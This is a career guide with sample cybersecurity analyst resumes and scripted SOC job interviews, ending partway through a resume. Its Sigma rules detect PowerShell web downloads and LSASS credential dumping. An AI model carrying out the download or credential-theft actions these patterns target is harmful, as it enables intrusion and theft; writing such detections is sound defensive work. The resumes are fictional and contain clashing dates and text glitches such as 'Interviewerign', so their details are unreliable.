CYBER-

SECURITY
RESUME
EXAMPLES AND
FULL INTERVIEW
SIMULATION

BY IZZMIER IZZUDDIN
ENTRY-LEVEL CYBERSECURITY ANALYST RESUME

WAYNE ROONEY
Cybersecurity Analyst | Aspiring Blue Teamer
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/waynerooney | GitHub: github.com/wayne

PROFESSIONAL SUMMARY

Highly motivated and detail-oriented cybersecurity enthusiast with foundational IT

knowledge and hands-on training in threat detection, incident response and log analysis.
Completed multiple Capture The Flag (CTF) challenges and simulated SOC labs. Holds
CompTIA Security+ and trained on SIEM platforms such as Splunk and Wazuh. Seeking to
contribute to a Security Operations Centre (SOC) team and grow as a Cybersecurity
Analyst.

EDUCATION

Bachelor of Information Technology (Networking)

Universiti Teknologi MARA (UiTM), Malaysia
Graduation: July 2023 | CGPA: 3.42

Relevant Coursework:

• Network Security
• Operating Systems
• Ethical Hacking & Penetration Testing
• Information Assurance

CERTIFICATIONS

• CompTIA Security+ (SY0-601) – Issued Oct 2023

• TryHackMe – SOC Level 1 Learning Path – Completed Jan 2024
• Google Cybersecurity Professional Certificate – Coursera, Completed March 2024

TECHNICAL SKILLS

Cybersecurity Tools:
Splunk, Wazuh, Wireshark, Security Onion, VirusTotal, MITRE ATT&CK Navigator, Zeek

Operating Systems:
Windows 10/11, Linux (Ubuntu, Kali), Windows Server 2016
Networking & Protocols:
TCP/IP, DNS, HTTP/S, FTP, SMB, VPN, SSH

Others:
Basic knowledge of PowerShell & Bash scripting, Ticketing Systems (ManageEngine demo)

PROJECTS & HANDS-ON EXPERIENCE

Virtual SOC Analyst Lab (Self-Learning Project)

• Set up Security Onion on a virtual lab to simulate log collection and alert analysis
• Analysed suspicious network traffic using Zeek and Suricata logs
• Created basic Splunk queries to detect brute force attacks and port scanning

TryHackMe “SOC Level 1” Path

• Investigated multiple attack scenarios including phishing, ransomware and lateral

movement
• Practiced alert triaging, log analysis and writing incident reports

Personal GitHub Portfolio

• Hosts analysis reports from CTF challenges

• Includes Sigma rule modifications and mock playbooks

INTERNSHIP EXPERIENCE

IT Support Intern
Maybank Berhad – Kuala Lumpur, Malaysia
Jan 2023 – June 2023

• Assisted in managing user access, password resets and endpoint troubleshooting

• Participated in basic security awareness campaigns
• Documented and escalated incidents to senior staff

CAPTURE THE FLAG (CTF) EXPERIENCE

• TryHackMe: Top 5% global rank (Username: wayne_cyber)

• BlueTeamLabs.online: Completed 20+ challenges
• Created write-ups for phishing detection, suspicious PowerShell analysis and
malicious email headers

SOFT SKILLS
• Strong analytical and problem-solving skills
• Fast learner, highly adaptable
• Excellent communication and documentation skills
• Team-oriented and reliable
SIMULATED INTERVIEW FOR AN ENTRY-LEVEL CYBERSECURITY ANALYST
(L1) POSITION

SECTION 1: INTRODUCTION & BACKGROUND

Interviewer: Welcome, Wayne. Can you start by telling us a bit about yourself and why
you're interested in this role at Cybermir Defense?

Candidate (Wayne): Thank you for the opportunity. I’m Wayne Rooney, a recent graduate
in IT Networking from UiTM. During my studies and internship, I developed a strong interest
in cybersecurity, especially blue team operations. I’ve since completed several online
labs, including the TryHackMe SOC Level 1 path and earned my Security+ certification.
I’m excited about the role at Cybermir Defense because of your reputation in managed
SOC services and your use of advanced tools like Cortex XDR and Splunk. I believe this
environment will help me grow technically and contribute to real-world cyber defence
operations.

SECTION 2: CYBERSECURITY FUNDAMENTALS

Interviewer: What is the CIA triad and why is it important in cybersecurity?

Candidate: The CIA triad stands for Confidentiality, Integrity and Availability. It's the
foundation of security principles:

• Confidentiality ensures data is accessible only to authorised users.

• Integrity ensures the accuracy and trustworthiness of data.
• Availability ensures that data and services are accessible when needed.
Maintaining the balance of these three is crucial for any secure system.

Interviewer: What is the difference between a vulnerability, a threat and a risk?

Candidate:

• A vulnerability is a weakness in a system (e.g., an unpatched OS).

• A threat is anything that can exploit that vulnerability (e.g., a hacker).
• A risk is the potential damage that could happen if the threat exploits the
vulnerability.

Interviewer: Can you explain the concept of least privilege?

Candidate: The principle of least privilege means giving users the minimum access or
permissions they need to perform their job. It helps reduce the risk of accidental or
intentional misuse of systems.
SECTION 3: TECHNICAL QUESTIONS

Interviewer: What are some common indicators of compromise (IOCs) you would look for
in log data?

Candidate: Common IOCs include:

• Unusual login times

• Multiple failed login attempts
• Access from foreign IPs or TOR nodes
• Sudden privilege escalation
• Command-line execution with suspicious flags (e.g., PowerShell with base64)
• Communication with known malicious domains or IPs

Interviewer: Let’s say you receive a SIEM alert showing 20 failed login attempts followed
by one successful login. What would you do?

Candidate: First, I’d verify the user and the source IP. Then:

1. Check the timeline and geolocation for anomalies.

2. Correlate with previous login history.
3. See if the IP is known or blacklisted.
4. Notify the incident response team if brute-force or credential stuffing is suspected.
5. Potentially isolate the system or disable the account if malicious activity is
confirmed.

Interviewer: How does DNS tunnelling work?

Candidate: DNS tunnelling is a technique where attackers encapsulate data into DNS
queries and responses to exfiltrate data or establish command-and-control. Since DNS
traffic is usually allowed, it can bypass firewalls if not inspected deeply.

SECTION 4: SCENARIO-BASED QUESTIONS

Interviewer: Imagine a user reports their system is running slow and files are being
renamed with a “.encrypted” extension. What do you do?

Candidate: Sounds like a ransomware infection. I would:

1. Immediately isolate the endpoint from the network.

2. Inform the IR team and escalate the ticket.
3. Collect logs from EDR and SIEM for file modification, processes and command-line
activity.
4. Check for any lateral movement or propagation to other systems.
 5. Identify the ransomware family via hash or note and reference threat intel.
6. Check backups for restoration and follow containment procedures.

Interviewer: You're on shift and receive a phishing alert triggered by the email gateway.
What steps will you take?

Candidate:

1. Review the email header (source, SPF/DKIM/DMARC status).

2. Check if the email contains suspicious links or attachments.
3. Identify recipients and whether the link was clicked.
4. Use a sandbox (e.g., Any.Run or VirusTotal) to analyse the payload.
5. Quarantine the email from all mailboxes.
6. Raise an incident if malicious and notify affected users with instructions.

SECTION 5: SOC DAILY RESPONSIBILITIES

Interviewer: What do you understand about SOC L1 daily duties?

Candidate: SOC L1 analysts monitor SIEM alerts, investigate low to moderate severity
events, escalate confirmed incidents and document findings. We triage alerts based on
priority and relevance, check log sources, perform basic correlation and escalate complex
cases to L2.

Interviewer: Have you used any ticketing systems?

Candidate: I’ve explored ManageEngine and ServiceNow in lab environments. I’m familiar
with raising, updating and closing tickets following standard operating procedures.

SECTION 6: COMMUNICATION & DOCUMENTATION

Interviewer: Why is documentation important in incident response?

Candidate: Documentation ensures traceability, helps in post-incident analysis and

supports compliance. It also enables knowledge sharing and consistency across the SOC
team.

Interviewer: How do you explain a technical issue to a non-technical client?

Candidate: I avoid jargon and use relatable analogies. For example, I might compare
phishing to someone pretending to be your bank and asking for your password. Clear,
simple language builds trust and understanding.

SECTION 7: BEHAVIOURAL & CAREER GOALS

Interviewer: Tell us about a time you faced a technical challenge and how you resolved it.

Candidate: In my TryHackMe lab, I couldn’t figure out how to decode an obfuscated

PowerShell command. I researched online, used CyberChef to decode it and discovered it
was part of a C2 beacon. That experience taught me patience, research skills and the
importance of using the right tools.

Interviewer: Where do you see yourself in the next 3 years?

Candidate: I aim to move into an L2 role, get certified in Blue Team Level 1 or SC-200 and
specialise in threat hunting. I also want to mentor newcomers and eventually contribute to
building detection use cases.

Interviewer: Do you prefer working independently or in a team?

Candidate: I’m comfortable with both. I enjoy independent investigations but also value
team discussions, especially during threat reviews and knowledge sharing.

INTERVIEW WRAP-UP

Interviewer: Thank you, Wayne. Do you have any questions for us?

Candidate: Yes, thank you. I’d like to ask:

1. What’s the typical growth path for an analyst here?

2. How often does the team conduct tabletop exercises or red/blue simulations?
3. Will I be involved in alert tuning or just triage initially?
CYBERSECURITY ANALYST L1 RESUME

CRISTIANO RONALDO
Cybersecurity Analyst | Threat Detection | Incident Response
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/cristianoronaldo | GitHub: github.com/cristianocyber

PROFESSIONAL SUMMARY

Results-driven Cybersecurity Analyst with over 2 years of hands-on experience in a 24/7

Managed SOC environment, specialising in log analysis, incident triage and threat
detection. Experienced with multiple SIEM platforms including Splunk and Wazuh,
endpoint detection (Cortex XDR) and email security. Proven ability to handle real-world
security incidents from detection to documentation and assist in tuning detection rules.
Now seeking to transition to an L2 role with greater ownership over threat response,
investigation and proactive threat hunting.

EDUCATION

Bachelor of Information Technology (Networking)

Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2023 | CGPA: 3.42

CERTIFICATIONS

• CompTIA Security+ – Issued Oct 2023

• Blue Team Level 1 (BTL1) – Issued Mar 2025
• Microsoft SC-200 (Security Operations Analyst) – In Progress
• TryHackMe: SOC Level 2 Path – Ongoing

TECHNICAL SKILLS

SIEM & Detection Tools:

Splunk, Wazuh, IBM QRadar, Cortex XDR, SentinelOne, Security Onion

Threat Intelligence & Forensics:

VirusTotal, Any.Run, AbuseIPDB, MITRE ATT&CK, CyberChef, Zeek

Scripting & Automation:

Basic Python (alert enrichment), Bash, Sigma Rule writing

Cloud & Email Security:

O365 Defender, Gmail Security Center, AWS CloudTrail
Other Tools:
Nmap, Wireshark, Windows Event Viewer, OSQuery, Sysmon

EXPERIENCE

Cybersecurity Analyst (L1)

IzzmierCyber Defense Sdn Bhd, Kuala Lumpur

Aug 2023 – Present

• Triaged 1000+ security alerts using Splunk, Cortex XDR and Wazuh platforms
• Handled phishing, brute-force, data exfiltration attempts and privilege escalation
alerts
• Performed initial incident investigation (host-based, network-based and email-
based)
• Participated in on-call rotations for critical incident escalations
• Assisted in rule tuning and alert enrichment using MITRE mappings
• Generated daily and weekly security reports for client stakeholders
• Created and maintained internal SOC playbooks and alert response templates
• Conducted knowledge-sharing sessions for newly hired L1 analysts

Key Achievements:

• Promoted to Senior L1 within 10 months based on performance

• Automated part of IOC lookups with Python + VirusTotal API
• Involved in minor threat hunting activity using OSQuery and Splunk correlation

PROJECTS & INITIATIVES

Internal Threat Simulation Lab (Blue Team Focus)

• Simulated endpoint attacks (ransomware, credential dumping) using Caldera

• Tested detection coverage via Wazuh and Cortex XDR
• Documented gaps and recommended Sigma rule updates

SOC Process Improvement Initiative

• Reviewed alert fatigue issues and identified redundant use cases

• Proposed correlation logic changes that reduced false positives by 30%

DOCUMENTATION & REPORTING

• Created 20+ internal case studies of handled incidents (de-identified)

• Standardised reporting format for phishing and malware alerts
 • Developed custom MITRE ATT&CK mapping sheets for internal training

CTF & CONTINUOUS LEARNING

• TryHackMe: SOC Level 2 path (Completed 75%)

• BlueTeamLabs.online: Completed 35+ challenges
• GitHub: Hosts IOC analysis, log walkthroughs and SIEM detection tests
• Regularly follows threat feeds from Group-IB, CISA and SANS

SOFT SKILLS

• Effective under pressure (shift-based, high alert volume)

• Excellent verbal & written communication (client-facing alerts & reports)
• Strong sense of ownership & escalation judgment
• Passionate about knowledge-sharing and mentorship
SIMULATED INTERVIEW FOR CURRENTLY WORKING AS A
CYBERSECURITY ANALYST L1 AND APPLYING FOR A CYBERSECURITY
ANALYST L2 POSITION

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Welcome, Cristiano. Could you please introduce yourself and share why
you're applying for this Cybersecurity Analyst L2 position at Cybermir Defence?

Candidate (Cristiano): Thank you. I’m Cristiano Ronaldo, currently a Senior Cybersecurity
Analyst L1 at IzzmierCyber Defense, where I’ve been for the past two years. My role
involves triaging alerts, performing incident investigations and supporting rule tuning.
I’m applying for this L2 position because I want to take on greater responsibility in handling
end-to-end incident response, threat hunting and play a bigger role in detection
engineering. I believe Cybermir Defence's reputation for advanced threat detection,
red/blue team collaboration and your use of modern tech stack really aligns with my
growth goals.

SECTION 2: CORE CYBERSECURITY KNOWLEDGE

Interviewer: What’s the difference between an Indicator of Compromise (IOC) and an

Indicator of Attack (IOA)?

Candidate: An IOC refers to artefacts like file hashes, IP addresses or domain names that
signal a system might be compromised.
An IOA, on the other hand, focuses on the behaviour or intent behind the activity, such as a
process spawning PowerShell or lateral movement using SMB. IOAs are more proactive for
early-stage detection, especially for fileless or evolving threats.

Interviewer: Explain the MITRE ATT&CK framework. How do you use it in daily SOC
operations?

Candidate: MITRE ATT&CK is a matrix of adversary tactics, techniques and procedures

(TTPs) based on real-world observations.
In my role, I use it to map alerts during investigations to understand the attack stage,
whether it’s Initial Access (like T1190: Exploit Public-Facing App) or Persistence (like
T1547: Registry Run Keys). We also use it when building new use cases and to evaluate our
detection coverage across the kill chain.

Interviewer: What are common false positives in a SOC and how do you reduce them?

Candidate: Some common ones include:

• Legitimate admin activity flagged as lateral movement

 • Vulnerability scans mistaken as recon
• User forgetting password triggering brute-force alerts

To reduce false positives, I help by:

1. Creating allowlists for known tools and sources

2. Enhancing correlation rules with contextual logic
3. Using threat intel feeds to validate IOCs
4. Documenting patterns in our alert tuning wiki

SECTION 3: TECHNICAL EXPERTISE

Interviewer: You mentioned you work with Cortex XDR and Splunk. Can you walk us
through a typical investigation process you follow for a suspicious alert?

Candidate: Certainly. Let's say I get an alert from Cortex XDR for powershell.exe making a
network connection:

1. Triage: Review alert metadata, process path, parent process, command-line

arguments, timestamp.
2. Correlation: Pivot to Splunk to check related events like login activity (4624/4625),
scheduled tasks, registry writes.
3. Threat Intel: Check IP or domain via VirusTotal and AbuseIPDB.
4. Scope: Search for lateral movement using winrm, wmic or file drops to other
systems.
5. Response: Isolate host if confirmed malicious, notify endpoint user and escalate
with detailed incident report.
6. Post-Incident: Update playbook if this variant hasn’t been handled before.

Interviewer: How would you write a basic Sigma rule to detect PowerShell downloads?

Candidate: Sure. A basic Sigma rule might look like this:

title: PowerShell Web Download

logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains: ['Invoke-WebRequest', 'iwr', 'DownloadString']
condition: selection
level: high
tags:
- attack.execution
- attack.t1059.001

We use this to generate detections in platforms like Wazuh or translate to Splunk via
backend converters.

SECTION 4: SCENARIO-BASED INVESTIGATION

Interviewer: Let’s simulate a real-world case. You received a high-severity alert from
Splunk:

“Multiple failed logins from 1.1.1.1 to 5 different admin accounts within 2 minutes. One
success.”

Walk us through your investigation steps.

Candidate:

1. Validate the Alert: Check if the source IP is internal or external.

2. Enrich Context:
o Pull the event logs (4625 + 4624)
o Check geo-location of 1.1.1.1 , if foreign, red flag
o Query user activity: Was this login normal for them? Any previous failed
attempts?
3. Investigate Success:
o Device used, lateral movement post-login
o Sessions opened, commands executed
4. Hunt Laterally:
o Use Sysmon and firewall logs to see if the attacker moved
o Check if tools like Mimikatz or certutil were used
5. Respond:
o Disable compromised accounts
o Notify IR team, isolate hosts
o Document root cause (e.g., brute force or credential reuse)
6. Improve Detection:
o Tune thresholds or enrich with MFA status
o Add watchlist IP if external

SECTION 5: THREAT HUNTING & TOOLING

Interviewer: Have you participated in threat hunting? Describe a hunt you've done.

Candidate: Yes. I recently ran a hunt based on the T1059.001 (PowerShell Execution)
technique.
 • Objective: Identify misuse of PowerShell beyond normal admin tasks
• Hypothesis: Attackers use PowerShell with encoded commands to bypass
detection
• Method:
o Queried Splunk for PowerShell with long base64 strings
o Checked command length > 1000 chars
o Used CyberChef to decode
o Found an instance of PowerShell being used to drop reverse shell script
• Outcome: Blocked the IP, blacklisted hash, created a new Sigma rule and shared
findings with the L1 team

Interviewer: Do you use any open-source tools or platforms to support your work?

Candidate: Absolutely. My common toolkit includes:

• CyberChef: Decoding and data transformations

• Zeek: Network visibility for threat hunting
• Any.Run & Hybrid Analysis: Sandbox analysis
• Sigma HQ & Red Canary GitHub: Detection engineering references
• I also follow CISA’s KEV list for prioritising alerts

SECTION 6: BEHAVIOURAL & TEAM DYNAMICS

Interviewer: Have you ever made a mistake in handling an alert? How did you handle it?

Candidate: Yes, early in my career, I mistakenly escalated a vulnerability scan as lateral

movement.
Once I realised, I informed my senior immediately, wrote a short RCA and added a note in
our internal playbook to differentiate scanner patterns (e.g., Nmap TCP Connect with 1-
second gaps).
It was a learning moment on double-checking source/destination context and using
baselining before escalating.

Interviewer: How do you mentor or help your L1 peers?

Candidate: I usually do weekly 30-min review sessions with new L1s to go over unusual
alerts. I’ve also created an internal quick-reference guide for common IOCs and Splunk
queries.
It helps them feel supported and I enjoy the collaborative aspect of our SOC.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Cristiano. Any questions for us?

Candidate: Yes, thank you:

1. Does your L2 role get involved in purple teaming or detection engineering directly?
2. How does Cybermir Defence handle post-incident learning, do you do
retrospectives or tabletop simulations?
3. What’s the team’s current focus, alert fatigue reduction, automation or expanding
threat coverage?
CYBERSECURITY ANALYST L2 RESUME

CARLOS TEVEZ
Cybersecurity Analyst | Threat Detection & Response | SOC Leadership Path
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/carlostevez | GitHub: github.com/carloscyber

PROFESSIONAL SUMMARY

Experienced and proactive Cybersecurity Analyst with 4+ years of SOC operations,

currently serving as L2. Proven expertise in incident response, threat hunting, detection
engineering and mentoring junior analysts. Strong command over SIEM tuning, threat intel
enrichment and hands-on investigation of APT-like activity. Seeking to transition into an L3
role to take ownership of complex investigations, lead threat detection strategy and
contribute to red/blue team synergy and SOC process maturity.

CURRENT ROLE

Cybersecurity Analyst – L2
IzzmierCyber Defense Sdn Bhd, Kuala Lumpur, Malaysia
Sept 2022 – Present

• Led investigations for critical alerts involving data exfiltration, ransomware staging
and privilege escalation
• Created and maintained advanced correlation rules in Splunk, Wazuh and Microsoft
Sentinel
• Conducted root cause analysis and created incident reports for clients and internal
stakeholders
• Performed threat hunting using MITRE ATT&CK, OSQuery and Zeek logs
• Developed playbooks and detection rules for new threats (TTP-based rather than
IOC-based)
• Acted as escalation point for L1 team, reviewing alerts and assisting with triage
training
• Involved in client onboarding, log source mapping and detection readiness review
• Worked with SOAR engineers to automate repetitive tasks and triage enrichment

Key Achievements:

• Detected and contained a real-world Cobalt Strike beaconing event within 45 mins
• Reduced false positives in brute-force alerts by 40% through rule refinement
• Led a mini red vs. blue simulation with purple team to improve coverage on T1071.001
(Web C2)

EDUCATION
Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2023 | CGPA: 3.42

CERTIFICATIONS

• Blue Team Level 1 (BTL1) – Blue Team Certs

• Microsoft SC-200 – Security Operations Analyst
• CompTIA CySA+ – Cybersecurity Analyst
• SANS SEC450 (GCLD – in progress)
• TryHackMe: Threat Hunting, Malware Analysis & SOC2 Paths – Completed

SKILLS SNAPSHOT

SIEM & Detection: Splunk, Wazuh, Microsoft Sentinel, ArcSight

EDR/NDR: Cortex XDR, CrowdStrike Falcon, Zeek, Suricata
Threat Intel: VirusTotal, Group-IB, Any.Run, MITRE ATT&CK, YARA
Scripting & Automation: Python, Bash, Sigma rules, SOAR logic design
Incident Response: DFIR methodology, chain of custody, log correlation
Cloud Security: AWS CloudTrail, Azure Defender, O365 audit logs
Tools: CyberChef, Velociraptor, OSQuery, Kusto Query Language (KQL), Sysmon

PROJECTS & INITIATIVES

SOC Threat Maturity Framework (Internal Project)

• Developed a gap analysis dashboard based on MITRE coverage

• Prioritised use case deployment based on real threat landscape
• Collaborated with red team to validate detection rules

Sigma Rule Conversion for Custom Splunk SIEM

• Wrote and tested 30+ detection rules

• Built alert logic to detect TTPs like T1110.003 (Password Spraying), T1059.003
(WMIC)

L1 Training & Quality Control Program

• Delivered bi-weekly threat breakdown sessions

• Reviewed 200+ tickets and improved L1 decision-making accuracy by 60%

KEY INCIDENT CASES

Case #2024-MAL-RX22 – Ransomware Detected Pre-Execution

 • Identified obfuscated PowerShell payload communicating with malicious IP
• Decoded base64 script and traced download to open RDP vulnerability
• Contained lateral spread using EDR and blocklisted hash in environment

Case #2025-BRU-APT3 – Malicious Use of Living-off-the-Land Binaries (LOLBins)

• Investigated odd use of certutil.exe for payload delivery

• Performed retrospective hunting and identified privilege escalation activity
• Worked with IR team to generate strategic recommendations for AD hardening

DOCUMENTATION & REPORTING

• Wrote 15+ client-facing post-incident reports

• Developed internal reporting templates with TTP mappings
• Contributed to quarterly SOC capability review presentations

CONTINUOUS LEARNING & COMMUNITY

• GitHub: Hosts Sigma rules, hunting queries, threat analysis reports

• Member: MITRE Engage, CyberDefenders.org community
• TryHackMe: Completed SOC2, Malware Analysis and Threat Intel labs
• Regular reader of DFIR Report, CISA alerts and Huntress threat feeds

SOFT SKILLS & TEAM IMPACT

• Proactive in cross-team collaboration (Red, Blue, IR)

• Strong communication for both technical and executive-level reporting
• Reliable escalation point for critical alerts
• Comfortable leading tabletop exercises and mini-IR drills
SIMULATED INTERVIEW FOR CURRENTLY A CYBERSECURITY ANALYST L2,
APPLYING FOR A CYBERSECURITY ANALYST L3 POSITION

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Carlos, welcome. To start off, could you briefly introduce yourself and
share why you’re interested in joining Cybermir Defence as a Cybersecurity Analyst L3?

Candidate (Carlos): Thank you. I’m Carlos Tevez, currently working as a Cybersecurity
Analyst L2 at IzzmierCyber Defense. Over the last 4 years, I’ve grown from triaging alerts to
owning full investigations, performing threat hunts and writing detection rules. I’ve also
been mentoring L1 analysts and leading some red/blue exercises internally.
What excites me about Cybermit Defence is your strong presence in the regional MDR
space and your blend of offensive and defensive capabilities. I’m ready to contribute at the
L3 level by leading investigations, improving detection logic and collaborating with your red
team to improve coverage.

SECTION 2: CORE CYBERSECURITY KNOWLEDGE

Interviewer: What’s the difference between reactive incident response and proactive
threat hunting?

Candidate: Reactive incident response is initiated after an alert or breach has occurred,
based on existing rules or triggers. Threat hunting is proactive; it involves forming
hypotheses about undetected threats and manually searching across the environment
using behavioural patterns or weak signals, often without any initial alert.

Interviewer: Can you explain the Cyber Kill Chain vs MITRE ATT&CK?

Candidate: The Cyber Kill Chain provides a high-level sequence of attack stages, from
reconnaissance to exfiltration. It's useful for visualising the flow of an attack.
MITRE ATT&CK is more granular, it maps specific tactics, techniques and procedures used
by adversaries. I find MITRE more actionable for detection engineering, as it aligns better
with how attacks manifest in logs and telemetry.

Interviewer: When reviewing an alert, how do you determine if it’s a true positive vs a false
positive?

Candidate: I evaluate the context:

• Was the activity normal for that user/system?

• Any known tooling involved?
• Did the event chain match known TTPs (e.g., T1059.001 for PowerShell)?
 • I also pivot to adjacent logs (auth, process, network) and enrich with threat intel.
A true positive usually reveals multiple layers of evidence. If isolated, I question
whether it's anomalous or Interviewerign.

SECTION 3: TECHNICAL EXPERTISE & DETECTION ENGINEERING

Interviewer: Tell us about a detection use case you developed and how you tested it.

Candidate: I developed a rule to detect living-off-the-land attacks using mshta.exe with

remote URLs (T1218.005).

• Detection logic: Look for mshta execution with http:// or .hta in the command line.
• Test: Simulated using a lab VM and executed a Interviewerign remote HTA file to
trigger detection.
• Result: Alert fired, no false positives in 7-day lookback.
I later added enrichment to pull process ancestry and geolocation of connections.

Interviewer: Have you written Sigma rules? If so, give us one for detecting credential
dumping via LSASS.

Candidate: Yes, I’ve written and converted many Sigma rules. Here's one for LSASS
access via tools like Mimikatz:

title: Suspicious LSASS Access

logsource:
product: windows
category: process_access
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess: '0x1410'
condition: selection
level: high
tags:
- attack.credential_access
- attack.t1003

This detects access attempts with elevated permissions targeting lsass.exe.

Interviewer: How do you deal with detection logic that causes alert fatigue?

Candidate: I refine logic using:

• Thresholds (e.g., >5 events per min)

 • Exclusions (allowlists, safe users/tools)
• Correlation (tie process + network + user activity)
• I also track false positive rates and feedback from L1s. If alerts provide low value, I
either tune, archive or replace them with better TTP-based logic.

SECTION 4: SCENARIO-BASED ASSESSMENT

Interviewer: Let’s walk through a scenario. You receive multiple alerts of powershell.exe
spawning from winword.exe across 3 endpoints. What do you do?

Candidate:

1. Triage: Confirm alerts are legitimate. Review process tree, command line (e.g.,
base64 encoded) and timestamps.
2. Correlate: Check whether all affected endpoints received the same Word file via
email or share.
3. Threat Intel: Decode payload, sandbox if needed (Any.Run), hash match with
VirusTotal.
4. Scope: Use EDR or SIEM to identify lateral movement or persistence.
5. Containment: Isolate machines, block indicators, notify IR.
6. Reporting: Create a detailed RCA. Map to MITRE (e.g., T1059, T1203). Recommend
awareness/training if it was a phishing attack.

Interviewer: Let’s say an attacker used certutil to download a tool and created a
scheduled task for persistence. What logs would you check?

Candidate: I’d check:

• Sysmon logs:
o Event ID 1 (Process Creation for certutil.exe)
o Event ID 3 (Network connections)
• Task Scheduler logs:
o Task registration (Event ID 106)
• Windows Security:
o New service or registry changes (Event ID 4697 or 4657)
• Persistence techniques:
o T1053.005 (Scheduled Task)
I’d also pivot to see if this TTP was isolated or part of a broader campaign.

SECTION 5: THREAT HUNTING, RED/BLUE TEAMING, TOOLS

Interviewer: Describe a real-world threat hunt you led.

Candidate: I conducted a hunt focused on T1059.003 (WMIC abuse) after discovering it in
APT reports.

• Hypothesis: Attackers may use wmic process call create for stealthy lateral
execution
• Data sources: Sysmon Event 1, Win Event Logs
• Query: WMIC with keywords like “create” or “powershell”
• Findings: One case of legacy IT script, excluded. No malicious instances, but we
added a Sigma rule and trained L1s on it.
Documented the hunt and shared it in our quarterly threat briefing.

Interviewer: Have you worked with red teams or in purple team simulations?

Candidate: Yes. I was part of a red/blue/purple exercise simulating a ransomware

incident. I:

• Validated detection gaps (missing alerts on file encryption tools)

• Tuned our rules for better coverage on vssadmin, rundll32 and wevtutil abuse
• Shared Sigma to Splunk conversion during post-mortem
It helped improve our EDR playbook and we ran table-top drills afterward.

SECTION 6: LEADERSHIP & COLLABORATION

Interviewer: How do you mentor junior analysts or manage escalations?

Candidate: I hold weekly L1 knowledge huddles covering interesting cases and detection
logic.
For escalations, I guide L1s to ask key questions (what, where, how, why) before passing
the ticket. I avoid taking over immediately, coaching through the process builds their
confidence.

Interviewer: How would you improve SOC maturity from an L3 perspective?

Candidate:

• Detection maturity: Align use cases with real threats (MITRE/CVE/Threat Intel)
• Automation: Collaborate with SOAR to auto-enrich triage
• Playbook improvement: Keep runbooks updated and tactical
• Red/blue feedback loop: After-action reviews with recommendations
• Metrics: Track MTTR, FP ratio, detection-to-containment time

SECTION 7: CLOSING QUESTIONS

Interviewer: That was excellent, Carlos. Do you have any questions for us?
Candidate: Yes, thank you. A few questions:

1. What are the main KPIs for L3 analysts here?

2. Does Cybermir Defence support contributions to open-source detection or
research?
3. What’s the growth path beyond L3, does it involve red team work, engineering or
leadership?
SOC ENGINEER RESUME

DIMITAR BERBATOV
Cybersecurity Analyst | Aspiring SOC Engineer | Detection Engineering | SIEM Development
Selangor, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/dimitarberbatov | GitHub: github.com/dimitarcyber

PROFESSIONAL SUMMARY

Security Operations professional with 3+ years of experience as an L1/L2 Cybersecurity

Analyst in a 24/7 SOC environment. Skilled in end-to-end alert triage, detection logic
tuning, log onboarding and SIEM pipeline optimisation. Adept at working with Splunk,
Wazuh and Microsoft Sentinel to create high-fidelity detections and reduce false positives.
Seeking to transition into a Cybersecurity Engineer (SOC Engineer) role to lead SIEM
deployment, rule development and operational tooling enhancements.

CURRENT POSITION

Cybersecurity Analyst (L2)

IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Oct 2022 – Present

• Collaborated with SOC engineering team on SIEM onboarding for 15+ log sources
including firewalls, proxies, endpoint and cloud (AWS, O365)
• Fine-tuned detection rules in Splunk and Wazuh, improving alert precision and
reducing false positives by over 35%
• Built and modified Sigma rules for ATT&CK-aligned detection use cases
• Conducted parsing validation, field extractions and log normalization (CEF, JSON,
Syslog)
• Assisted in SOAR integration for Cortex XDR alert triage automation
• Documented and maintained detection rules, use case mapping and playbooks in
Confluence
• Provided escalation guidance and supported junior analysts with investigation
workflow

Key Projects:

• Built alert correlation rule for multi-vector brute-force followed by PowerShell beacon
• Supported Sentinel rule migration and KQL query optimisation for one major enterprise
client
• Developed log onboarding checklist and mapping template for SIEM engineers

EDUCATION
Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2022 | CGPA: 3.42

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst

• Microsoft SC-200 – Security Operations Analyst
• Splunk Core Certified Power User
• TryHackMe: SIEM & Detection Engineering Labs – Completed

SKILLS MATRIX

SIEM Platforms:

• Splunk (Search Processing Language - SPL)

• Microsoft Sentinel (KQL queries, Workbook Dashboards)
• Wazuh (custom rules, log configuration)
• ArcSight (basic experience)

Detection Engineering:

• Sigma Rules (custom and from public repos)

• MITRE ATT&CK mapping
• Rule tuning & false positive reduction
• Alert suppression & correlation logic

Log Source & Parsing:

• CEF, JSON, LEEF, Syslog

• Field extractions, normalization, log validation
• Log onboarding documentation

Scripting & Automation:

• Python (IOC enrichment, alert parsing)

• PowerShell (collection script)
• SOAR (Cortex XSOAR – basic integration experience)

Threat Intelligence:

• VirusTotal, Any.Run, AbuseIPDB, MISP

• IOC enrichment and correlation
Other Tools:

• CyberChef, Git, Regex101, OSQuery, Elastic, Zeek

PROJECTS & INITIATIVES

SIEM Log Onboarding & Normalisation Framework

• Developed onboarding checklist with log validation tests

• Worked with clients to define use cases based on log availability
• Wrote regex-based field extractions in Splunk

Detection Engineering Sprint for ATT&CK Coverage

• Created 20+ custom rules for techniques such as T1059 (Command Execution),
T1078 (Valid Accounts)
• Built weekly dashboards for detection efficacy and gap analysis

Alert Enrichment using Python Scripts

• Created scripts to auto-lookup IP/domain hash on VirusTotal

• Pushed enrichment back into the alert ticket to assist triage

DOCUMENTATION & RUNBOOKS

• Maintained SIEM documentation: data sources, parsers, rule descriptions

• Authored alert tuning guides for junior analysts
• Created onboarding SOPs and troubleshooting guides for parsing issues

SOFT SKILLS & TEAM CONTRIBUTION

• Strong analytical thinking and attention to detail

